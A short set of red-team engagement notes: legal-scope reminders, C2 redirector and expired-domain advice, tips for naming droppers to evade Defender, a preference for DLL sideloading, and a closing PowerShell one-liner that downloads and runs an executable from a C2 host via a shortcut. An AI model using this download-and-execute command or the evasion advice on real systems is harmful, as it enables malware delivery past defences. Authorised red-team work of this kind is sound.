Some tricks and notes around Red Team engagements

• Before an engagement do you have:
  • Full legal sign off for what you are about to do?
  • A clearly defined legal scope of what networks / ranges / machines you are allowed to target and test?
  • Does the entire team know the scope boundaries and has it been briefed in full?
  • Never break the law. Always ask clients permission (or have it explicitly in scope) before running an exploit. If the exploit could cause a device to go down, in that circumstance, always seek explicit permission from the authorising entity.
• For Cobalt Strike ops, see cheat sheet here I forked from An0nUD4Y on GH. Some good stuff in there both for Cobalt Strike and also general post exploitation. I may edit that, and / or pull some things into here where I find them useful in red team offensive development / infrastructure creation / hardening .

C2 infrastructure

I have some notes on redirectors on my forked cheat sheet, but mostly:

• Use redirectors.
• Use expired domains to look for newly expired domains, check them in proxy tools / AlienVault for any existing reputation etc.
• Invest some time in maturing infrastructure if required.

Droppers

Do not name them chrome.exe, ms-updater.exe - certainly if they are unsigned, Defender’s ML will pick these up as machine learning trojan signatures - and rightly so. Choose something more unique or bespoke.

If it can be avoided; do NOT use an executable, always go for a DLL and preferably choose DLL sideloading.

Code signing certificates can go a long way; I would not recommend using leaked ones, this could be seen as theft, though I do not know any specific case law around it. It’s not worth it imo.

Powershell one-liner which can be stuck into a shortcut to download from a C2 into % ProgramData%: powershell.exe -w h -c "iwr http://172.17.57.89:8080/thanks -o $env:ProgramData\test.exe; start $env:ProgramData\test.exe"